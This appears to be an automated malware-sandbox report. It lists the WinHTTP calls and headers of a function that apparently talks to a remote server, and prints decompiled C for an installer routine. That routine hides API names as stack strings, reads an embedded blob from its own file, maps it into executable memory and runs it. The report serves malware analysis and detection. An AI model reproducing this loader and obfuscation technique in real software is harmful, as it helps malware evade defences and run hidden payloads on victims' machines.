                                                                                                                                                    0x00000000
                                                                                                                                                    0x10022072
                                                                                                                                                    0x00000000
                                                                                                                                                    0x10022042
                                                                                                                                                    0x10022026
                                                                                                                                                    0x10022027
                                                                                                                                                    0x1002202c
                                                                                                                                                    0x10022031
                                                                                                                                                    0x00000000
                                                                                                                                                    0x10022031
                                                                                                                                                    0x10021ffb
                                                                                                                                                    0x10021c08
                                                                                                                                                    0x10021c08
                                                                                                                                                    0x10021c23
                                                                                                                                                    0x10021c4a
                                                                                                                                                    0x10021c1d
                                                                                                                                                    0x10021c1d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x10021c23
                                                                                                                                                    0x10021c06
                                                                                                                                                    0x10021af1

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 10020FA0: _memset.LIBCMT ref: 100210BB
                                                                                                                                                      • Part of subcall function 10020FA0: _strlen.LIBCMT ref: 100210FA
                                                                                                                                                      • Part of subcall function 1001A370: _strlen.LIBCMT ref: 1001A381
                                                                                                                                                      • Part of subcall function 1001A370: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1001A39C
                                                                                                                                                      • Part of subcall function 1001A370: _memset.LIBCMT ref: 1001A3C6
                                                                                                                                                      • Part of subcall function 1001A370: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1001A3E2
                                                                                                                                                    • _wcscpy_s.LIBCMT ref: 100219CE
                                                                                                                                                    • _wcscpy_s.LIBCMT ref: 100219E3
                                                                                                                                                    • WinHttpOpen.WINHTTP(A WinHTTP Example Program/1.0,00000000,00000000,00000000,00000000), ref: 10021A14
                                                                                                                                                    • WinHttpSetOption.WINHTTP(00000000,00000026,00000003,0000000C), ref: 10021A5C
                                                                                                                                                    • WinHttpSetOption.WINHTTP(00000000,00000058,?,00000004), ref: 10021A87
                                                                                                                                                    • WinHttpConnect.WINHTTP(00000000,?,00000050,00000000), ref: 10021A9F
                                                                                                                                                    • WinHttpOpenRequest.WINHTTP(00000000,?,?,HTTP/1.1,00000000,00000000,00000100), ref: 10021AE4
                                                                                                                                                    • WinHttpSetCredentials.WINHTTP(00000000,00000001,00000001,?,?,00000000), ref: 10021B39
                                                                                                                                                    • WinHttpQueryOption.WINHTTP(00000000,0000001F,00000100,?), ref: 10021B6F
                                                                                                                                                    • WinHttpSetOption.WINHTTP(00000000,0000001F,00000100,00000004), ref: 10021BA4
                                                                                                                                                    • WinHttpAddRequestHeaders.WINHTTP(00000000,User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36,000000FF,A0000000), ref: 10021BBA
                                                                                                                                                    • WinHttpAddRequestHeaders.WINHTTP(00000000,Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3,000000FF,A0000000), ref: 10021BD0
                                                                                                                                                    • WinHttpAddRequestHeaders.WINHTTP(00000000,Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7,000000FF,A0000000), ref: 10021BE6
                                                                                                                                                    • WinHttpAddRequestHeaders.WINHTTP(00000000,upgrade-insecure-requests: 1,000000FF,A0000000), ref: 10021BFC
                                                                                                                                                    • WinHttpAddRequestHeaders.WINHTTP(00000000,00000000,000000FF,A0000000), ref: 10021C4A
                                                                                                                                                    • _memset.LIBCMT ref: 10021C85
                                                                                                                                                    • _wcscpy_s.LIBCMT ref: 10021C9E
                                                                                                                                                    • _wcscat_s.LIBCMT ref: 10021CB9
                                                                                                                                                    • WinHttpAddRequestHeaders.WINHTTP(00000000,?,000000FF,A0000000), ref: 10021CD3
                                                                                                                                                    • WinHttpAddRequestHeaders.WINHTTP(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,A0000000), ref: 10021D18
                                                                                                                                                      • Part of subcall function 10021250: _memset.LIBCMT ref: 100212E6
                                                                                                                                                      • Part of subcall function 10021250: _memset.LIBCMT ref: 10021303
                                                                                                                                                      • Part of subcall function 10021250: _memset.LIBCMT ref: 10021320
                                                                                                                                                      • Part of subcall function 10021250: _sprintf.LIBCMT ref: 10021342
                                                                                                                                                      • Part of subcall function 10021250: _sprintf.LIBCMT ref: 1002135C
                                                                                                                                                      • Part of subcall function 10021250: _sprintf.LIBCMT ref: 10021388
                                                                                                                                                      • Part of subcall function 10021250: _strlen.LIBCMT ref: 1002139F
                                                                                                                                                      • Part of subcall function 10021250: _strlen.LIBCMT ref: 100213C7
                                                                                                                                                    • WinHttpSetTimeouts.WINHTTP(00000000,0000C350,0000C350,0000C350,0000C350), ref: 10021DAC
                                                                                                                                                    • _memset.LIBCMT ref: 10021E0E
                                                                                                                                                    • WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,?,?,?,00000000), ref: 10021EB2
                                                                                                                                                    • WinHttpReceiveResponse.WINHTTP(00000000,00000000), ref: 10021ECB
                                                                                                                                                    • WinHttpQueryHeaders.WINHTTP(00000000,00000016,00000000,00000000,?,00000000), ref: 10021EFB
                                                                                                                                                    • GetLastError.KERNEL32 ref: 10021F01
                                                                                                                                                    • _memset.LIBCMT ref: 10021F3B
                                                                                                                                                    • WinHttpQueryHeaders.WINHTTP(00000000,00000016,00000000,?,?,00000000), ref: 10021F5B
                                                                                                                                                    • WinHttpQueryDataAvailable.WINHTTP(00000000,?), ref: 10022016
                                                                                                                                                    • GetLastError.KERNEL32 ref: 10022020
                                                                                                                                                    • _printf.LIBCMT ref: 1002202C
                                                                                                                                                    • WinHttpCloseHandle.WINHTTP(00000000), ref: 10022161
                                                                                                                                                    • WinHttpCloseHandle.WINHTTP(00000000), ref: 10022171
                                                                                                                                                    • WinHttpCloseHandle.WINHTTP(00000000), ref: 10022181
                                                                                                                                                    Strings
                                                                                                                                                    • Cookie: , xrefs: 10021C8D
                                                                                                                                                    • upgrade-insecure-requests: 1, xrefs: 10021BF3
                                                                                                                                                    • WinHttpQueryDataAvailable failed. Error = %d, xrefs: 10022027
                                                                                                                                                    • WinHttpQueryDataAvailable failed. Error = %d, xrefs: 100220BF
                                                                                                                                                    • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3, xrefs: 10021BC7
                                                                                                                                                    • Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7, xrefs: 10021BDD
                                                                                                                                                    • HTTP/1.1, xrefs: 10021AD3
                                                                                                                                                    • User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36, xrefs: 10021BB1
                                                                                                                                                    • GET, xrefs: 100219C3
                                                                                                                                                    • Content-Type: application/x-www-form-urlencoded, xrefs: 10021D0F
                                                                                                                                                    • Out of memory., xrefs: 10022068
                                                                                                                                                    • A WinHTTP Example Program/1.0, xrefs: 10021A0F
                                                                                                                                                    • POST, xrefs: 100219D8
                                                                                                                                                    • Content-Type: multipart/form-data; boundary=%ws, xrefs: 10021D58
                                                                                                                                                    • P, xrefs: 1002191E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000004.00000002.645019852.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                    • Associated: 00000004.00000002.645009330.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.645045809.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646312035.0000000010333000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646339843.0000000010338000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646354560.0000000010339000.00000004.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Http$HeadersRequest$_memset$OptionQuery_strlen$CloseHandle_sprintf_wcscpy_s$ByteCharErrorLastMultiOpenWide$AvailableConnectCredentialsDataReceiveResponseSendTimeouts_printf_wcscat_s
                                                                                                                                                    • String ID: A WinHTTP Example Program/1.0$Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7$Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3$Content-Type: application/x-www-form-urlencoded$Content-Type: multipart/form-data; boundary=%ws$Cookie: $GET$HTTP/1.1$Out of memory.$P$POST$User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36$WinHttpQueryDataAvailable failed. Error = %d$WinHttpQueryDataAvailable failed. Error = %d$upgrade-insecure-requests: 1
                                                                                                                                                    • API String ID: 2394362766-3430901228
                                                                                                                                                    • Opcode ID: 26eb675be386f86b91229bf80edc5aad5e3253f7fc229ac22e39b4339e404410
                                                                                                                                                    • Instruction ID: 08a761f198d39d3b23f65939abeca5ac731fbbe5e8dbecabeefe22ea0cac9579
                                                                                                                                                    • Opcode Fuzzy Hash: 26eb675be386f86b91229bf80edc5aad5e3253f7fc229ac22e39b4339e404410
                                                                                                                                                    • Instruction Fuzzy Hash: FF4227B5D00218EBEB24CFA4DC85FDEB7B5EB48304F508258F609A7281D775AA85CF91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004041A3, Relevance: 60.1, APIs: 23, Strings: 11, Instructions: 621filememorystringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 59%
                                                                                                                                                    			E004041A3(void* __eax, CHAR* __ebx, void* __edi, intOrPtr __esi, signed int _a4, unsigned int _a8, signed int _a12, struct HWND__* _a16, signed int _a20, unsigned int _a24, long _a28, long _a32, long _a40, long _a48, struct HWND__* _a56, void _a60, CHAR* _a64, intOrPtr _a76, CHAR* _a80, intOrPtr _a88, intOrPtr _a96, intOrPtr _a100, unsigned int _a104, intOrPtr _a108) {
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				char _v316;
				char _v317;
				char _v318;
				char _v319;
				char _v320;
				char _v321;
				char _v322;
				char _v323;
				char _v324;
				char _v325;
				char _v326;
				char _v327;
				char _v328;
				void* _v332;
				char _v336;
				char _v337;
				char _v338;
				char _v339;
				char _v340;
				char _v341;
				char _v342;
				char _v343;
				char _v344;
				char _v345;
				char _v346;
				char _v347;
				char _v348;
				char _v349;
				char _v350;
				char _v351;
				char _v352;
				char _v353;
				char _v354;
				char _v355;
				char _v356;
				char _v357;
				char _v358;
				char _v359;
				char _v360;
				char _v365;
				short _v367;
				intOrPtr _v371;
				intOrPtr _v375;
				intOrPtr _v379;
				char _v380;
				intOrPtr _v383;
				void* _v384;
				void* _v388;
				char _v392;
				void* _v396;
				void* _v400;
				char _v401;
				char _v402;
				char _v403;
				char _v404;
				char _v405;
				char _v406;
				char _v407;
				char _v408;
				char _v409;
				char _v410;
				char _v411;
				char _v412;
				long _v416;
				void* _v420;
				void* _v424;
				void* _v428;
				void* _v432;
				intOrPtr _v436;
				intOrPtr _v440;
				void* _v444;
				char _v446;
				char _v447;
				char _v448;
				char _v449;
				char _v450;
				char _v451;
				char _v452;
				char _v453;
				char _v454;
				char _v455;
				char _v456;
				char _v457;
				char _v458;
				char _v459;
				char _v460;
				intOrPtr _v464;
				char _v465;
				char _v466;
				char _v467;
				char _v468;
				char _v469;
				char _v470;
				char _v471;
				char _v472;
				char _v473;
				char _v474;
				char _v475;
				char _v476;
				void* _v480;
				void* _v484;
				char _v488;
				char _v489;
				char _v490;
				char _v491;
				char _v496;
				char _v497;
				char _v498;
				char _v499;
				char _v500;
				char _v501;
				char _v502;
				char _v503;
				void* _v504;
				long _v508;
				void* __ebp;
				char* _t302;
				intOrPtr _t365;
				signed int _t369;
				char _t376;
				unsigned int _t378;
				DWORD* _t382;
				intOrPtr _t385;
				signed short _t392;
				void* _t398;
				struct HWND__* _t405;
				CHAR* _t413;
				signed int _t414;
				signed int _t442;
				void* _t465;
				intOrPtr* _t466;
				signed int _t467;
				struct HWND__* _t473;
				signed int _t474;
				intOrPtr _t475;
				CHAR* _t476;
				unsigned int _t477;
				char* _t478;
				unsigned int _t479;
				char* _t480;
				struct HWND__* _t482;
				struct HWND__* _t484;
				unsigned int _t521;

				_t475 = __esi;
				_t413 = __ebx;
				_push(__edi);
				if(__esi != 0x40b) {
					L3:
					if(_t475 != 0x110) {
						L11:
						if(_t475 != 0x111) {
							L23:
							if(_t475 == 0x40f) {
								L25:
								_a12 = _a12 & 0x00000000;
								E00406CD7(0x3fb, _t413);
								E00406730(_t511, _t413);
								_t476 = 0x43fd48;
								_t465 = 1;
								_t416 =  ==  ? _t465 : 0;
								_a4 =  ==  ? _t465 : 0;
								E00406DAF(0x43fd48, _t413);
								_t466 = E00406B97(_t465);
								if(_t466 == 0) {
									L32:
									E00406DAF(_t476, _t413);
									_t302 = E00406E41(_t476);
									if(_t302 != 0) {
										 *_t302 = 0;
									}
									if(GetDiskFreeSpaceA(_t476,  &_a32,  &_a40,  &_a28,  &_a48) == 0) {
										_t477 = _a24;
										_t467 = _a20;
										goto L39;
									} else {
										_t369 = MulDiv(_a32 * _a40, _a28, 0x400);
										asm("cdq");
										_t467 = _t369;
										_t477 = 0x300;
										L37:
										_a20 = _t467;
										_a24 = _t477;
										_a12 = 1;
										L39:
										_t414 = E0040592D(5);
										if(_a8 == 0) {
											L44:
											_t413 = _a16;
											L45:
											_push(_t482);
											_t482 = _t484;
											_t484 = _t484 - 0x1f8;
											_v444 = 0;
											_v420 = 0;
											_v384 = 0;
											_v383 = 0;
											_v379 = 0;
											_v375 = 0;
											_v371 = 0;
											_v367 = 0;
											_v365 = 0;
											_v504 = 0x56;
											_v503 = 0x69;
											_v502 = 0x72;
											_v501 = 0x74;
											_v500 = 0x75;
											_v499 = 0x61;
											_v498 = 0x6c;
											_v497 = 0x41;
											_v496 = 0x6c;
											L47:
											asm("invalid");
											asm("insb");
											_v491 = 0x6c;
											_v490 = 0x6f;
											_v489 = 0x63;
											_v488 = 0;
											_v460 = 0x56;
											_v459 = 0x69;
											_v458 = 0x72;
											_v457 = 0x74;
											_v456 = 0x75;
											_v455 = 0x61;
											_v454 = 0x6c;
											_v453 = 0x50;
											_v452 = 0x72;
											_v451 = 0x6f;
											_v450 = 0x74;
											_v449 = 0x65;
											_v448 = 0x63;
											_v447 = 0x74;
											_v446 = 0;
											_v24 = 0x47;
											_v23 = 0x65;
											_v22 = 0x74;
											_v21 = 0x4d;
											_v20 = 0x6f;
											_v19 = 0x64;
											_v18 = 0x75;
											_v17 = 0x6c;
											_v16 = 0x65;
											_v15 = 0x46;
											_v14 = 0x69;
											_v13 = 0x6c;
											_v12 = 0x65;
											_v11 = 0x4e;
											_v10 = 0x61;
											_v9 = 0x6d;
											_v8 = 0x65;
											_v7 = 0x41;
											_v6 = 0;
											_v476 = 0x43;
											_v475 = 0x72;
											_v474 = 0x65;
											_v473 = 0x61;
											_v472 = 0x74;
											_v471 = 0x65;
											_v470 = 0x46;
											_v469 = 0x69;
											_v468 = 0x6c;
											_v467 = 0x65;
											_v466 = 0x41;
											_v465 = 0;
											_v360 = 0x47;
											_v359 = 0x65;
											_v358 = 0x74;
											_v357 = 0x46;
											_v356 = 0x69;
											_v355 = 0x6c;
											_v354 = 0x65;
											_v353 = 0x53;
											_v352 = 0x69;
											_v351 = 0x7a;
											_v350 = 0x65;
											_v349 = 0;
											_v36 = 0x52;
											_v35 = 0x65;
											_v34 = 0x61;
											_v33 = 0x64;
											_v32 = 0x46;
											_v31 = 0x69;
											_v30 = 0x6c;
											_v29 = 0x65;
											_v28 = 0;
											_v328 = 0x43;
											_v327 = 0x6c;
											_v326 = 0x6f;
											_v325 = 0x73;
											_v324 = 0x65;
											_v323 = 0x48;
											_v322 = 0x61;
											_v321 = 0x6e;
											_v320 = 0x64;
											_v319 = 0x6c;
											_v318 = 0x65;
											_v317 = 0;
											_v348 = 0x47;
											_v347 = 0x65;
											_v346 = 0x74;
											_v345 = 0x4c;
											_v344 = 0x61;
											_v343 = 0x73;
											_v342 = 0x74;
											_v341 = 0x45;
											_v340 = 0x72;
											_v339 = 0x72;
											_v338 = 0x6f;
											_v337 = 0x72;
											_v336 = 0;
											_v412 = 0x45;
											_v411 = 0x78;
											_v410 = 0x69;
											_v409 = 0x74;
											_v408 = 0x50;
											_v407 = 0x72;
											_v406 = 0x6f;
											_v405 = 0x63;
											_v404 = 0x65;
											_v403 = 0x73;
											_v402 = 0x73;
											_v401 = 0;
											_v444 = 0;
											_v484 = 0;
											_v388 = 0;
											_v48 = 0;
											_v332 = 0;
											_v44 = 0;
											_v384 = 0;
											_v480 = 0;
											_v432 = 0;
											_v40 = 0;
											_v400 = 0;
											_v428 = 0;
											E00404BC6(_t414);
											_v440 = E00404C06( &_v444,  &_v484,  &_v388);
											_t194 =  &_v500; // 0x56
											_v48 = _v388(_v444, _t194);
											_t198 =  &_v460; // 0x56
											_v332 = _v388(_v444, _t198);
											_t202 =  &_v24; // 0x47
											_v44 = _v388(_v444, _t202);
											_t206 =  &_v476; // 0x43
											_v384 = _v388(_v444, _t206);
											_t210 =  &_v360; // 0x47
											_v480 = _v388(_v444, _t210);
											_t214 =  &_v36; // 0x52
											_v432 = _v388(_v444, _t214);
											_t218 =  &_v328; // 0x43
											_v40 = _v388(_v444, _t218);
											_t222 =  &_v348; // 0x47
											_v400 = _v388(_v444, _t222);
											_t226 =  &_v412; // 0x45
											_v428 = _v388(_v444, _t226);
											E00405156( &_v316,  &_v316, 0, 0x104);
											E00405156( &_v316,  &_v380, 0, 0x14);
											_v44(0,  &_v316, 0x104);
											_v420 = CreateFileA( &_v316, 0x80000000, 3, 0, 3, 0x80, 0);
											_v464 = _v400();
											_v424 = VirtualAlloc(0, 0x4d, 0x3000, 4);
											E00405156( &_v316, _v424, 0, 0x4d);
											ReadFile(_v420, _v424, 0x4d,  &_v508, 0);
											FindCloseChangeNotification(_v420);
											E00405196( &_v392, _v424 + 0x45, 4);
											E00405196( &_v416, _v424 + 0x49, 4);
											_v420 = CreateFileA( &_v316, 0x80000000, 3, 0, 3, 0x80, 0);
											_v464 = _v400();
											_v396 = VirtualAlloc(0, _v392 + _v416, 0x3000, 4);
											E00405156(_v392 + _v416, _v396, 0, _v392 + _v416);
											ReadFile(_v420, _v396, _v392 + _v416,  &_v508, 0);
											_v464 = _v400();
											_v40(_v420);
											_v504 = VirtualAlloc(0, _v416, 0x3000, 0x40);
											E00405196(_v504, _v396 + _v392, _v416);
											E00405316(_v392,  &_v380, 0xa);
											_v436 = E00405356(_v392,  &_v380);
											_t365 = E00404EC6(_t413, _v504, _v416,  &_v380, _v436, _v484, _v388, _v48, _v332); // executed
											_v440 = _t365;
											return _v428(0);
										}
										_t521 = _t477;
										if(_t521 > 0 || _t521 >= 0 && _t467 >= _t414) {
											goto L44;
										} else {
											_t413 = 2;
											goto L45;
										}
									}
								}
								_t478 = 0;
								while(1) {
									 *0x4092c8(0x43fd48,  &_a20,  &_a40,  &_a48);
									_t376 =  *_t466();
									if(_t376 != 0) {
										break;
									}
									if(_t478 != 0) {
										 *_t478 = _t376;
									}
									_t480 = E00406F12(0x43fd48);
									 *_t480 = 0;
									_t478 = _t480 - 1;
									 *_t478 = 0x5c;
									if(_t478 != 0x43fd48) {
										continue;
									} else {
										_t476 = 0x43fd48;
										goto L32;
									}
								}
								_t479 = _a8;
								_t467 = (_t479 << 0x00000020 | _a4) >> 0xa;
								_t477 = _t479 >> 0xa;
								__eflags = _t477;
								goto L37;
							}
							_t511 = _t475 - 0x405;
							if(_t475 != 0x405) {
								goto L47;
							}
							goto L25;
						}
						_t378 = _a104;
						_t414 = _t378 & 0x0000ffff;
						if(_t414 != 0x3fb) {
							L15:
							if(_t414 == 0x3e9) {
								_t442 = 7;
								memset( &_a60, 0, _t442 << 2);
								_t484 = _t484 + 0xc;
								_t414 = 0;
								_a56 = _t482;
								_a64 = 0x435d28;
								_a76 = 0x4050b0;
								_a80 = _t413;
								_a60 = E0040603B(_t413, 0x435d28, _t475);
								_t382 =  &_a48;
								_a64 = 0x41;
								__imp__SHBrowseForFolderA(_t382, 0x43dd48, _a12);
								if(_t382 == 0) {
									_t475 = 0x40f;
									_a88 = 0x40f;
								} else {
									__imp__CoTaskMemFree(_t382);
									E00406655(_t413);
									_t385 =  *((intOrPtr*)( *0x455030 + 0x11c));
									if(_t385 != 0 && _t413 == 0x480000) {
										_push(_t385);
										_push(0);
										E0040603B(_t413, 0x435d28, _t475);
										if(lstrcmpiA(0x44cfc0, 0x435d28) != 0) {
											lstrcatA(_t413, 0x44cfc0);
										}
									}
									 *0x43dd40 =  *0x43dd40 + 1;
									SetDlgItemTextA(_t482, 0x3fb, _t413);
								}
							}
							goto L23;
						}
						if(_t378 >> 0x10 != 0x300) {
							goto L47;
						}
						_t475 = _t414 + 0x14;
						_a100 = _t475;
						goto L15;
					}
					_t473 = GetDlgItem(_t482, 0x3fb);
					_a16 = _t473;
					_t392 = GetAsyncKeyState(0x10);
					_t414 = 0x8000;
					if((0x00008000 & _t392) != 0) {
						_t405 = GetDlgItem(_t482, 0x3f0);
						_push(0xffffffe0);
						_push(8);
						_push(_t482);
						E00405662(_t405);
						ShowWindow(_t405, 8);
						_t475 = _a88;
					}
					if(E00406FD9(_t413) != 0 && E00406E41(_t413) == 0) {
						E00406655(_t413);
					}
					 *0x450ffc = _t482;
					SetWindowTextA(_t473, _t413);
					_push( *((intOrPtr*)(_a108 + 0x34)));
					_push(1);
					_push(_t482);
					E00405662(_a108);
					_push( *((intOrPtr*)(_a96 + 0x30)));
					_push(0x14);
					_push(_t482);
					_t398 = E00405662(_a96);
					_push(_t473);
					E0040564B(_t398);
					_t474 = E00406B97(6);
					if(_t474 == 0) {
						goto L47;
					} else {
						_t414 = _t474;
						 *0x4092c8(_v12, 1);
						 *_t474();
						goto L11;
					}
				}
				E00406CD7(0x3fb, __ebx);
				E00406F40(__ebx);
				E0040595C();
				if(GetDlgItem(_t482, 0x3f0) == 0) {
					goto L47;
				} else {
					 *0x44c7a0 = IsDlgButtonChecked(_t482, 0x3f0);
					goto L3;
				}
			}

















































































































































































                                                                                                                                                    0x004041a3
                                                                                                                                                    0x004041a3
                                                                                                                                                    0x004041a5
                                                                                                                                                    0x004041b1
                                                                                                                                                    0x004041e6
                                                                                                                                                    0x004041ec
                                                                                                                                                    0x004042a8
                                                                                                                                                    0x004042ae
                                                                                                                                                    0x00404395
                                                                                                                                                    0x0040439b
                                                                                                                                                    0x004043a9
                                                                                                                                                    0x004043a9
                                                                                                                                                    0x004043b4
                                                                                                                                                    0x004043ba
                                                                                                                                                    0x004043c3
                                                                                                                                                    0x004043c8
                                                                                                                                                    0x004043cc
                                                                                                                                                    0x004043d0
                                                                                                                                                    0x004043d4
                                                                                                                                                    0x004043df
                                                                                                                                                    0x004043e3
                                                                                                                                                    0x0040442f
                                                                                                                                                    0x00404431
                                                                                                                                                    0x00404437
                                                                                                                                                    0x0040443e
                                                                                                                                                    0x00404440
                                                                                                                                                    0x00404440
                                                                                                                                                    0x00404460
                                                                                                                                                    0x004044a2
                                                                                                                                                    0x004044a6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00404462
                                                                                                                                                    0x00404475
                                                                                                                                                    0x0040447b
                                                                                                                                                    0x0040447c
                                                                                                                                                    0x0040447e
                                                                                                                                                    0x00404491
                                                                                                                                                    0x00404493
                                                                                                                                                    0x00404498
                                                                                                                                                    0x0040449c
                                                                                                                                                    0x004044aa
                                                                                                                                                    0x004044b6
                                                                                                                                                    0x004044b8
                                                                                                                                                    0x004044c9
                                                                                                                                                    0x004044c9
                                                                                                                                                    0x004044cd
                                                                                                                                                    0x004044d6
                                                                                                                                                    0x004044d7
                                                                                                                                                    0x004044d9
                                                                                                                                                    0x004044df
                                                                                                                                                    0x004044e9
                                                                                                                                                    0x004044f3
                                                                                                                                                    0x004044fc
                                                                                                                                                    0x00404502
                                                                                                                                                    0x00404508
                                                                                                                                                    0x0040450e
                                                                                                                                                    0x00404514
                                                                                                                                                    0x0040451b
                                                                                                                                                    0x00404521
                                                                                                                                                    0x00404528
                                                                                                                                                    0x0040452f
                                                                                                                                                    0x00404536
                                                                                                                                                    0x0040453d
                                                                                                                                                    0x00404544
                                                                                                                                                    0x0040454b
                                                                                                                                                    0x00404552
                                                                                                                                                    0x00404559
                                                                                                                                                    0x0040455d
                                                                                                                                                    0x0040455d
                                                                                                                                                    0x0040455f
                                                                                                                                                    0x00404560
                                                                                                                                                    0x00404567
                                                                                                                                                    0x0040456e
                                                                                                                                                    0x00404575
                                                                                                                                                    0x0040457c
                                                                                                                                                    0x00404583
                                                                                                                                                    0x0040458a
                                                                                                                                                    0x00404591
                                                                                                                                                    0x00404598
                                                                                                                                                    0x0040459f
                                                                                                                                                    0x004045a6
                                                                                                                                                    0x004045ad
                                                                                                                                                    0x004045b4
                                                                                                                                                    0x004045bb
                                                                                                                                                    0x004045c2
                                                                                                                                                    0x004045c9
                                                                                                                                                    0x004045d0
                                                                                                                                                    0x004045d7
                                                                                                                                                    0x004045de
                                                                                                                                                    0x004045e5
                                                                                                                                                    0x004045e9
                                                                                                                                                    0x004045ed
                                                                                                                                                    0x004045f1
                                                                                                                                                    0x004045f5
                                                                                                                                                    0x004045f9
                                                                                                                                                    0x004045fd
                                                                                                                                                    0x00404601
                                                                                                                                                    0x00404605
                                                                                                                                                    0x00404609
                                                                                                                                                    0x0040460d
                                                                                                                                                    0x00404611
                                                                                                                                                    0x00404615
                                                                                                                                                    0x00404619
                                                                                                                                                    0x0040461d
                                                                                                                                                    0x00404621
                                                                                                                                                    0x00404625
                                                                                                                                                    0x00404629
                                                                                                                                                    0x0040462d
                                                                                                                                                    0x00404631
                                                                                                                                                    0x00404638
                                                                                                                                                    0x0040463f
                                                                                                                                                    0x00404646
                                                                                                                                                    0x0040464d
                                                                                                                                                    0x00404654
                                                                                                                                                    0x0040465b
                                                                                                                                                    0x00404662
                                                                                                                                                    0x00404669
                                                                                                                                                    0x00404670
                                                                                                                                                    0x00404677
                                                                                                                                                    0x0040467e
                                                                                                                                                    0x00404685
                                                                                                                                                    0x0040468c
                                                                                                                                                    0x00404693
                                                                                                                                                    0x0040469a
                                                                                                                                                    0x004046a1
                                                                                                                                                    0x004046a8
                                                                                                                                                    0x004046af
                                                                                                                                                    0x004046b6
                                                                                                                                                    0x004046bd
                                                                                                                                                    0x004046c4
                                                                                                                                                    0x004046cb
                                                                                                                                                    0x004046d2
                                                                                                                                                    0x004046d9
                                                                                                                                                    0x004046dd
                                                                                                                                                    0x004046e1
                                                                                                                                                    0x004046e5
                                                                                                                                                    0x004046e9
                                                                                                                                                    0x004046ed
                                                                                                                                                    0x004046f1
                                                                                                                                                    0x004046f5
                                                                                                                                                    0x004046f9
                                                                                                                                                    0x004046fd
                                                                                                                                                    0x00404704
                                                                                                                                                    0x0040470b
                                                                                                                                                    0x00404712
                                                                                                                                                    0x00404719
                                                                                                                                                    0x00404720
                                                                                                                                                    0x00404727
                                                                                                                                                    0x0040472e
                                                                                                                                                    0x00404735
                                                                                                                                                    0x0040473c
                                                                                                                                                    0x00404743
                                                                                                                                                    0x0040474a
                                                                                                                                                    0x00404751
                                                                                                                                                    0x00404758
                                                                                                                                                    0x0040475f
                                                                                                                                                    0x00404766
                                                                                                                                                    0x0040476d
                                                                                                                                                    0x00404774
                                                                                                                                                    0x0040477b
                                                                                                                                                    0x00404782
                                                                                                                                                    0x00404789
                                                                                                                                                    0x00404790
                                                                                                                                                    0x00404797
                                                                                                                                                    0x0040479e
                                                                                                                                                    0x004047a5
                                                                                                                                                    0x004047ac
                                                                                                                                                    0x004047b3
                                                                                                                                                    0x004047ba
                                                                                                                                                    0x004047c1
                                                                                                                                                    0x004047c8
                                                                                                                                                    0x004047cf
                                                                                                                                                    0x004047d6
                                                                                                                                                    0x004047dd
                                                                                                                                                    0x004047e4
                                                                                                                                                    0x004047eb
                                                                                                                                                    0x004047f2
                                                                                                                                                    0x004047f9
                                                                                                                                                    0x00404800
                                                                                                                                                    0x0040480a
                                                                                                                                                    0x00404814
                                                                                                                                                    0x0040481e
                                                                                                                                                    0x00404825
                                                                                                                                                    0x0040482f
                                                                                                                                                    0x00404836
                                                                                                                                                    0x00404840
                                                                                                                                                    0x0040484a
                                                                                                                                                    0x00404854
                                                                                                                                                    0x0040485b
                                                                                                                                                    0x00404865
                                                                                                                                                    0x0040486f
                                                                                                                                                    0x0040488e
                                                                                                                                                    0x00404894
                                                                                                                                                    0x004048a8
                                                                                                                                                    0x004048ab
                                                                                                                                                    0x004048bf
                                                                                                                                                    0x004048c5
                                                                                                                                                    0x004048d6
                                                                                                                                                    0x004048d9
                                                                                                                                                    0x004048ed
                                                                                                                                                    0x004048f3
                                                                                                                                                    0x00404907
                                                                                                                                                    0x0040490d
                                                                                                                                                    0x0040491e
                                                                                                                                                    0x00404924
                                                                                                                                                    0x00404938
                                                                                                                                                    0x0040493b
                                                                                                                                                    0x0040494f
                                                                                                                                                    0x00404955
                                                                                                                                                    0x00404969
                                                                                                                                                    0x0040497d
                                                                                                                                                    0x00404990
                                                                                                                                                    0x004049a6
                                                                                                                                                    0x004049c8
                                                                                                                                                    0x004049d4
